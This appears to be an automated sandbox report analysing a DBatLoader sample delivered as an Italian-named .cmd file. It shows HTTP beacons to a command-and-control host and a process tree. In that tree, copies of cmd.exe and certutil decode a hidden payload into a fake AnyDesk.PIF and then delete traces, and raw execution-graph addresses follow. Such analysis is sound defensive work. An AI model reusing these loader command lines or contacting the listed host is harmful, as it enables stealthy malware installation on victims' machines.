                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     49 | 192.168.2.4 | 49949 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-26 08:40:35 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:35 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:35 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     50 | 192.168.2.4 | 49955 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-26 08:40:37 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:38 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:37 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     51 | 192.168.2.4 | 49962 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-26 08:40:39 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:40 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:39 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     52 | 192.168.2.4 | 49969 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-26 08:40:42 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:42 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:42 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     53 | 192.168.2.4 | 49976 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-26 08:40:44 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:44 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:44 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     54 | 192.168.2.4 | 49983 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-26 08:40:46 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:46 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:46 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use



                                                    Target ID:0
                                                    Start time:03:38:41
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "
                                                    Imagebase:0x7ff7139e0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:03:38:41
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\extrac32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                    Imagebase:0x7ff679a60000
                                                    File size:35'328 bytes
                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Windows\System32\extrac32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                    Imagebase:0x7ff679a60000
                                                    File size:35'328 bytes
                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:03:38:42
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\kn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                    Imagebase:0x7ff67c4b0000
                                                    File size:1'651'712 bytes
                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:03:38:43
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:03:38:43
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\kn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                    Imagebase:0x7ff67c4b0000
                                                    File size:1'651'712 bytes
                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:03:38:44
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Imagebase:0x400000
                                                    File size:1'299'968 bytes
                                                    MD5 hash:BCEEA9753420A675AF68CDA43864438E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 68%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:03:38:44
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:03:38:44
                                                    Start date:26/11/2024
                                                    Path:C:\Users\Public\alpha.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                    Imagebase:0x7ff7e1db0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:5.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:34.5%
                                                      Total number of Nodes:1151
                                                      Total number of Limit Nodes:32
                                                      [Execution graph node/edge listing omitted: the rendered graph for alpha.exe covers the cmd.exe process-launch path (InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreateProcessW / CreateProcessAsUserW, DeleteProcThreadAttributeList), console title handling (GetConsoleTitleW / SetConsoleTitleW), handle redirection (_dup, _dup2, _close, DuplicateHandle, _get_osfhandle), executable lookup (SearchPathW, GetFileAttributesW, NeedCurrentDirectoryForExePathW, GetDriveTypeW) and heap/memory housekeeping (GetProcessHeap, RtlFreeHeap, HeapAlloc, VirtualQuery, VirtualFree).]
7ff7e1dbf871 18779->18782 18780 7ff7e1dbf8c0 456 API calls 18783 7ff7e1dcd203 18780->18783 18781 7ff7e1dbf881 18781->18725 18782->18780 18782->18781 18785 7ff7e1dbfc6a 18784->18785 18786 7ff7e1dcd55c 18784->18786 18787 7ff7e1dcd571 memset longjmp 18785->18787 18802 7ff7e1dbfca2 18785->18802 18788 7ff7e1db3278 166 API calls 18786->18788 18790 7ff7e1dbfce7 18787->18790 18789 7ff7e1dcd566 18788->18789 18789->18787 18790->18735 18791 7ff7e1dbfd73 18792 7ff7e1dbfd99 18791->18792 18793 7ff7e1dcd638 18791->18793 18794 7ff7e1dbff70 2 API calls 18792->18794 18795 7ff7e1db3278 166 API calls 18793->18795 18797 7ff7e1dbfda1 18794->18797 18796 7ff7e1dcd64c 18795->18796 18798 7ff7e1dbff70 2 API calls 18796->18798 18797->18735 18799 7ff7e1dcd654 longjmp 18798->18799 18803 7ff7e1dbff4f 18799->18803 18802->18790 18802->18791 18802->18802 18802->18803 18804 7ff7e1dcd609 18802->18804 18810 7ff7e1dcd5b5 memmove 18802->18810 18833 7ff7e1dc18d4 18802->18833 18907 7ff7e1dbd840 GetProcessHeap HeapAlloc 18802->18907 18805 7ff7e1dcd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18803->18805 18807 7ff7e1dc0167 MultiByteToWideChar 18803->18807 18808 7ff7e1dc0131 SetFilePointer 18803->18808 18806 7ff7e1db3278 166 API calls 18804->18806 18813 7ff7e1dc0190 18805->18813 18811 7ff7e1dcd615 18806->18811 18807->18813 18808->18803 18812 7ff7e1db3278 166 API calls 18810->18812 18814 7ff7e1dbff70 2 API calls 18811->18814 18815 7ff7e1dcd5e6 18812->18815 18813->18735 18816 7ff7e1dcd61f longjmp 18814->18816 18817 7ff7e1dbff70 2 API calls 18815->18817 18816->18793 18818 7ff7e1dcd5f0 longjmp 18817->18818 18818->18804 18819->18750 18821 7ff7e1dd8450 367 API calls 18820->18821 18823 7ff7e1ddbf59 18821->18823 18822 7ff7e1ddbf6b GetLastError 18823->18822 18824 7ff7e1ddbf62 18823->18824 18824->18755 18826 7ff7e1ddf4c1 GetStdHandle 18825->18826 18827 7ff7e1dd8450 367 API calls 18826->18827 18828 7ff7e1ddf4ea 18827->18828 18829 7ff7e1ddf4ee wcschr 18828->18829 18830 7ff7e1ddf509 18828->18830 18829->18826 
18829->18830 18831 7ff7e1dc8f80 7 API calls 18830->18831 18832 7ff7e1ddf519 18831->18832 18832->18770 18834 7ff7e1dc1935 18833->18834 18835 7ff7e1dc193b 18833->18835 18834->18835 18836 7ff7e1dc19a1 18834->18836 18837 7ff7e1dc195a 18835->18837 18838 7ff7e1dc1946 wcsrchr 18835->18838 18840 7ff7e1dc2e44 memset malloc 18836->18840 18880 7ff7e1dcdbda 18836->18880 18839 7ff7e1dc8f80 7 API calls 18837->18839 18838->18837 18842 7ff7e1dc1978 18839->18842 18860 7ff7e1dc19cf 18840->18860 18841 7ff7e1dcdbdf longjmp 18843 7ff7e1dcdbf3 ??_V@YAXPEAX 18841->18843 18842->18802 18844 7ff7e1dcdbff ??_V@YAXPEAX 18843->18844 18844->18837 18845 7ff7e1dc1a21 18848 7ff7e1dcdc3c wcschr 18845->18848 18849 7ff7e1dc1a3c wcsrchr 18845->18849 18857 7ff7e1dc1dfe 18845->18857 18846 7ff7e1dc19f3 towlower wcsrchr 18846->18845 18847 7ff7e1dc1af6 wcsrchr 18846->18847 18853 7ff7e1dc1b11 towlower 18847->18853 18847->18857 18851 7ff7e1dcdcd2 18848->18851 18852 7ff7e1dcdc5d 18848->18852 18850 7ff7e1dc1a54 wcsrchr 18849->18850 18849->18857 18850->18851 18854 7ff7e1dc1a71 18850->18854 18851->18844 18856 7ff7e1db3278 166 API calls 18851->18856 18855 7ff7e1dbcd90 166 API calls 18852->18855 18853->18857 18853->18860 18863 7ff7e1dbb900 166 API calls 18854->18863 18870 7ff7e1dc1a95 18854->18870 18866 7ff7e1dcdc75 18855->18866 18859 7ff7e1dcdcef longjmp 18856->18859 18857->18848 18857->18851 18858 7ff7e1dc1d74 18858->18837 18867 7ff7e1dc1d7d ??_V@YAXPEAX 18858->18867 18862 7ff7e1dcdd03 18859->18862 18860->18845 18860->18846 18860->18857 18860->18880 18861 7ff7e1dcdccd 18861->18844 18868 7ff7e1dcdd3b 18862->18868 18869 7ff7e1dcdd0c SearchPathW 18862->18869 18863->18870 18864 7ff7e1dc1acf 18871 7ff7e1dbb900 166 API calls 18864->18871 18865 7ff7e1dc1b64 18865->18862 18873 7ff7e1dc1b76 GetFullPathNameW 18865->18873 18872 7ff7e1dc3a90 170 API calls 18866->18872 18866->18880 18867->18837 18877 7ff7e1dcdd5c wcsrchr 18868->18877 18869->18868 18870->18858 18870->18864 18870->18865 18870->18880 18874 7ff7e1dc1ad7 
??_V@YAXPEAX 18871->18874 18875 7ff7e1dcdc98 18872->18875 18876 7ff7e1dc2978 13 API calls 18873->18876 18874->18837 18878 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18875->18878 18879 7ff7e1dc1ba7 wcsrchr 18876->18879 18882 7ff7e1dcdd73 18877->18882 18878->18880 18879->18877 18881 7ff7e1dc1bc9 18879->18881 18880->18837 18880->18841 18880->18861 18881->18858 18883 7ff7e1dc1bda memset 18881->18883 18884 7ff7e1dcdd8c 18882->18884 18885 7ff7e1dcdd78 longjmp 18882->18885 18886 7ff7e1dbca40 17 API calls 18883->18886 18884->18843 18884->18844 18885->18884 18887 7ff7e1dc1c23 18886->18887 18887->18882 18888 7ff7e1dcdda8 GetFileAttributesExW 18887->18888 18900 7ff7e1dc1c4f 18887->18900 18889 7ff7e1dcdfd0 18888->18889 18891 7ff7e1dcddc5 18888->18891 18889->18802 18890 7ff7e1dbb900 166 API calls 18892 7ff7e1dc1d52 18890->18892 18893 7ff7e1dcdf34 18891->18893 18897 7ff7e1dd85d0 8 API calls 18891->18897 18892->18858 18896 7ff7e1dc1d68 ??_V@YAXPEAX 18892->18896 18898 7ff7e1dcdf4d 18893->18898 18893->18900 18894 7ff7e1dc1d09 18894->18890 18895 7ff7e1dce035 18894->18895 18896->18858 18899 7ff7e1dcde3f 18897->18899 18901 7ff7e1de08ec 9 API calls 18898->18901 18903 7ff7e1db6ee4 166 API calls 18899->18903 18900->18857 18900->18894 18902 7ff7e1dc1cd8 wcsrchr 18900->18902 18901->18889 18902->18895 18904 7ff7e1dc1cf5 18902->18904 18905 7ff7e1dcdeb6 18903->18905 18904->18857 18904->18894 18906 7ff7e1dc3140 166 API calls 18905->18906 18906->18893 18908 7ff7e1dbd8b5 18907->18908 18909 7ff7e1dbdefa 18907->18909 18911 7ff7e1dbdf04 18908->18911 18913 7ff7e1dbd8e5 18908->18913 18910 7ff7e1db3278 166 API calls 18909->18910 18910->18911 18912 7ff7e1dbdf15 longjmp 18911->18912 18937 7ff7e1dbda67 18911->18937 18912->18937 18916 7ff7e1dbd94d GetProcessHeap HeapAlloc 18913->18916 18917 7ff7e1dbdeb6 18913->18917 18913->18937 18914 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18915 7ff7e1dbdf34 18914->18915 18918 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18915->18918 18916->18917 18927 7ff7e1dbd97c 18916->18927 
18919 7ff7e1db3278 166 API calls 18917->18919 18920 7ff7e1dbdf3c 18918->18920 18921 7ff7e1dbdec5 18919->18921 18920->18802 18922 7ff7e1dbdeda longjmp 18921->18922 18921->18937 18922->18937 18923 7ff7e1dc081c 166 API calls 18923->18927 18924 7ff7e1dbdbce wcstol 18924->18927 18925 7ff7e1dbdaa9 18926 7ff7e1dbde4a 18925->18926 18932 7ff7e1dbdaf3 18925->18932 18925->18937 18928 7ff7e1db3278 166 API calls 18926->18928 18926->18937 18927->18921 18927->18923 18927->18924 18927->18925 18927->18927 18929 7ff7e1dbdc43 18927->18929 18927->18937 18930 7ff7e1dbde69 longjmp 18928->18930 18931 7ff7e1dbdc52 wcstol 18929->18931 18929->18937 18930->18937 18931->18937 18933 7ff7e1dbdb80 _wcsnicmp 18932->18933 18932->18937 18933->18932 18934 7ff7e1dbdd0f 18933->18934 18935 7ff7e1dbdd30 memmove 18934->18935 18936 7ff7e1dbde97 memmove 18934->18936 18935->18937 18936->18917 18937->18914 18939 7ff7e1ddd381 18938->18939 18940 7ff7e1ddd3d8 18938->18940 18941 7ff7e1dc34a0 166 API calls 18939->18941 18943 7ff7e1ddd390 18941->18943 18942 7ff7e1dc3448 166 API calls 18942->18943 18943->18940 18943->18942 18944 7ff7e1dc34a0 166 API calls 18943->18944 18944->18943 18946 7ff7e1dc3448 166 API calls 18945->18946 18947 7ff7e1ddd33b 18946->18947 18948 7ff7e1ddd36c 166 API calls 18947->18948 18949 7ff7e1ddd343 18948->18949 18950 7ff7e1ddd3fc 166 API calls 18949->18950 18967 7ff7e1ddd34e 18950->18967 18951 7ff7e1ddd5c2 18951->18677 18952 7ff7e1ddd576 18953 7ff7e1ddd592 18952->18953 18965 7ff7e1ddd555 18952->18965 18955 7ff7e1dc3448 166 API calls 18953->18955 18954 7ff7e1ddd5c4 18957 7ff7e1dc3448 166 API calls 18954->18957 18959 7ff7e1ddd5a5 18955->18959 18956 7ff7e1ddd541 18956->18953 18962 7ff7e1ddd546 18956->18962 18957->18951 18958 7ff7e1ddd31c 166 API calls 18958->18951 18960 7ff7e1ddd5ba 18959->18960 18963 7ff7e1dc3448 166 API calls 18959->18963 18964 7ff7e1ddd36c 166 API calls 18960->18964 18961 7ff7e1dc3448 166 API calls 18961->18967 18962->18954 18962->18965 18963->18960 18964->18951 18965->18958 
18966 7ff7e1ddd3fc 166 API calls 18966->18967 18967->18951 18967->18952 18967->18953 18967->18954 18967->18956 18967->18961 18967->18965 18967->18966 18970 7ff7e1ddbfb5 18969->18970 18971 7ff7e1ddbf99 18969->18971 18970->18553 18970->18566 18970->18571 18972 7ff7e1dc9324 malloc 18971->18972 18972->18970 18980 7ff7e1db58d4 RegOpenKeyExW 18973->18980 18976 7ff7e1dc33f0 _vsnwprintf 18977 7ff7e1db58c2 18976->18977 18977->18571 18978->18571 18981 7ff7e1db5913 RegQueryValueExW RegCloseKey 18980->18981 18982 7ff7e1db588c 18980->18982 18981->18982 18982->18976 18986 7ff7e1dd773c 18983->18986 18984 7ff7e1dd777d 18984->18606 18985 7ff7e1dc3448 166 API calls 18985->18986 18986->18984 18986->18985 18988 7ff7e1dd778c 166 API calls 18987->18988 18989 7ff7e1dd76fb 18988->18989 18990 7ff7e1dd771c 18989->18990 18991 7ff7e1dc3448 166 API calls 18989->18991 18990->18606 18992 7ff7e1dd7711 18991->18992 18993 7ff7e1dd778c 166 API calls 18992->18993 18993->18990 18995 7ff7e1dbc486 18994->18995 18996 7ff7e1dbc4c9 18994->18996 18997 7ff7e1dbc48e wcschr 18995->18997 19001 7ff7e1dbc161 18995->19001 19000 7ff7e1dbff70 2 API calls 18996->19000 18996->19001 18998 7ff7e1dbc4ef 18997->18998 18997->19001 18999 7ff7e1dbcd90 166 API calls 18998->18999 19007 7ff7e1dbc4f9 18999->19007 19000->19001 19001->18118 19001->18126 19002 7ff7e1dbc5bd 19003 7ff7e1dbc541 19002->19003 19005 7ff7e1dbb6b0 170 API calls 19002->19005 19003->19001 19004 7ff7e1dbff70 2 API calls 19003->19004 19004->19001 19005->19003 19006 7ff7e1dbd840 178 API calls 19006->19007 19007->19001 19007->19002 19007->19003 19007->19006 19008->18141 19010 7ff7e1dc3bfe 19009->19010 19012 7ff7e1dc3bcf 19009->19012 19010->18207 19011 7ff7e1dc3bdc wcschr 19011->19010 19011->19012 19012->19010 19012->19011 19014 7ff7e1dc8f80 7 API calls 19013->19014 19015 7ff7e1dc296b 19014->19015 19015->18207 19017 7ff7e1dc2f2a 19016->19017 19018 7ff7e1dc2f97 19016->19018 19019 7ff7e1dc823c 10 API calls 19017->19019 19018->19017 19020 7ff7e1dc2f9c wcschr 
19018->19020 19022 7ff7e1dc2f56 19019->19022 19021 7ff7e1dc2fb6 wcschr 19020->19021 19028 7ff7e1dc2f5a 19020->19028 19021->19017 19021->19028 19023 7ff7e1dc3a0c 2 API calls 19022->19023 19022->19028 19024 7ff7e1dc2fe0 19023->19024 19026 7ff7e1dc2fe9 wcsrchr 19024->19026 19024->19028 19025 7ff7e1dc8f80 7 API calls 19027 7ff7e1dc2f83 19025->19027 19026->19028 19027->18207 19028->19025 19029 7ff7e1dce4ec 19028->19029 19031 7ff7e1dd4621 19030->19031 19032 7ff7e1db72de 19030->19032 19036 7ff7e1dd447b longjmp 19031->19036 19039 7ff7e1dd4639 19031->19039 19053 7ff7e1dd47e0 19031->19053 19056 7ff7e1dd475e 19031->19056 19033 7ff7e1db72eb 19032->19033 19037 7ff7e1dd4530 19032->19037 19038 7ff7e1dd4467 19032->19038 19091 7ff7e1db7348 19033->19091 19035 7ff7e1db7348 168 API calls 19077 7ff7e1dd4524 19035->19077 19040 7ff7e1dd4492 19036->19040 19042 7ff7e1db7348 168 API calls 19037->19042 19038->19033 19038->19040 19051 7ff7e1dd4475 19038->19051 19045 7ff7e1dd4695 19039->19045 19046 7ff7e1dd463e 19039->19046 19041 7ff7e1db7348 168 API calls 19040->19041 19063 7ff7e1dd44a8 19041->19063 19065 7ff7e1dd4549 19042->19065 19043 7ff7e1db7315 19106 7ff7e1db73d4 19043->19106 19050 7ff7e1db73d4 168 API calls 19045->19050 19046->19036 19054 7ff7e1dd4654 19046->19054 19047 7ff7e1db7348 168 API calls 19047->19043 19048 7ff7e1db72b0 168 API calls 19057 7ff7e1dd480e 19048->19057 19068 7ff7e1dd469a 19050->19068 19051->19036 19051->19045 19052 7ff7e1db7348 168 API calls 19052->19053 19053->19035 19066 7ff7e1db7348 168 API calls 19054->19066 19055 7ff7e1dd45b2 19059 7ff7e1db7348 168 API calls 19055->19059 19056->19052 19057->18253 19058 7ff7e1db7323 19058->18253 19062 7ff7e1dd45c7 19059->19062 19060 7ff7e1dd455e 19060->19055 19069 7ff7e1db7348 168 API calls 19060->19069 19061 7ff7e1dd46e1 19067 7ff7e1db72b0 168 API calls 19061->19067 19070 7ff7e1db7348 168 API calls 19062->19070 19064 7ff7e1dd44e2 19063->19064 19071 7ff7e1db7348 168 API calls 19063->19071 19072 7ff7e1db72b0 168 API calls 
